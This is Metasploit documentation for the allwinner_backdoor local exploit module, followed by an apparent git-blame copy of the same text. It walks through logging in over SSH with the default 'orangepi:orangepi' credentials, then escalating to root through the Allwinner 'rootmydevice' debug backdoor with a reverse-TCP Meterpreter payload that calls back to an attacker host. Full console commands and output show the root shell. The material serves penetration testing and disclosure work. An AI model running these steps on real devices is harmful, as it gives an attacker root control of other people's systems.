documentation/modules/exploit/multi/local/allwinner_backdoor.md

## Introduction

Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
Vulnerable OS: all OS images available for Orange Pis,
				 any for FriendlyARM's NanoPi M1,
				 SinoVoip's M2+ and M3,
				 Cuebietech's Cubietruck +
				 Linksprite's pcDuino8 Uno
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets

This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.

## Usage

To use this module, you need a vulnerable device.  An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.

- `use auxiliary/scanner/ssh/ssh_login`

```
msf auxiliary(ssh_login) > set username orangepi
username => orangepi
msf auxiliary(ssh_login) > set password orangepi
password => orangepi
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
rhosts => 192.168.2.21
msf auxiliary(ssh_login) > exploit

[*] 192.168.2.21:22 SSH - Starting bruteforce
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

- `use exploit/multi/local/allwinner_backdoor`

```
msf exploit(allwinner_backdoor) > set verbose true
verbose => true
msf exploit(allwinner_backdoor) > set session 1
session => 1
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
payload => linux/armle/meterpreter/reverse_tcp
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(allwinner_backdoor) > check
[*]  The target appears to be vulnerable.
msf exploit(allwinner_backdoor) > exploit
```

## Successful exploitation:

```
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[+] Backdoor Found, writing payload to /tmp/odzVx.elf
[*] Max line length is 65537
[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[+] Escalating
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.2.248
OS           : Ubuntu 14.04 (Linux 3.4.39)
Architecture : armv7l
Meterpreter  : armle/linux
```
Fixes from review 2018-02-03 11:23:58 -05:00			`## Introduction`

			`Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4`
			`Vulnerable OS: all OS images available for Orange Pis,`
post to local conversion 2016-09-22 22:08:24 -04:00			`any for FriendlyARM's NanoPi M1,`
			`SinoVoip's M2+ and M3,`
			`Cuebietech's Cubietruck +`
			`Linksprite's pcDuino8 Uno`
Fixes from review 2018-02-03 11:23:58 -05:00			`Exploitation may be possible against Dragon (x10) and Allwinner Android tablets`
post to local conversion 2016-09-22 22:08:24 -04:00
			`This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.`

			`## Usage`

			`To use this module, you need a vulnerable device. An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.`

			- `use auxiliary/scanner/ssh/ssh_login`

			```
			`msf auxiliary(ssh_login) > set username orangepi`
			`username => orangepi`
			`msf auxiliary(ssh_login) > set password orangepi`
			`password => orangepi`
			`msf auxiliary(ssh_login) > set rhosts 192.168.2.21`
			`rhosts => 192.168.2.21`
			`msf auxiliary(ssh_login) > exploit`

			`[*] 192.168.2.21:22 SSH - Starting bruteforce`
			`[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '`
			`[!] No active DB -- Credential data will not be saved!`
			`[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400`
			`[*] Scanned 1 of 1 hosts (100% complete)`
			`[*] Auxiliary module execution completed`
			```

			- `use exploit/multi/local/allwinner_backdoor`

			```
			`msf exploit(allwinner_backdoor) > set verbose true`
			`verbose => true`
			`msf exploit(allwinner_backdoor) > set session 1`
			`session => 1`
update documentation to point to meterpreter again 2017-04-26 17:49:08 -05:00			`msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp`
			`payload => linux/armle/meterpreter/reverse_tcp`
post to local conversion 2016-09-22 22:08:24 -04:00			`msf exploit(allwinner_backdoor) > set lhost 192.168.2.117`
			`lhost => 192.168.2.117`
			`msf exploit(allwinner_backdoor) > check`
			`[*] The target appears to be vulnerable.`
			`msf exploit(allwinner_backdoor) > exploit`
			```

			`## Successful exploitation:`

			```
update documentation to point to meterpreter again 2017-04-26 17:49:08 -05:00			`[*] Started reverse TCP handler on 192.168.2.117:4444`
post to local conversion 2016-09-22 22:08:24 -04:00			`[*] Transmitting intermediate stager...(136 bytes)`
			`[*] Sending stage (374540 bytes) to 192.168.2.248`
			`[+] Backdoor Found, writing payload to /tmp/odzVx.elf`
			`[*] Max line length is 65537`
			`[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf`
			`[+] Escalating`
			`[*] Transmitting intermediate stager...(136 bytes)`
			`[*] Sending stage (374540 bytes) to 192.168.2.248`
			`[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 192.168.2.248`
			`OS : Ubuntu 14.04 (Linux 3.4.39)`
			`Architecture : armv7l`
			`Meterpreter : armle/linux`
update documentation to point to meterpreter again 2017-04-26 17:49:08 -05:00			```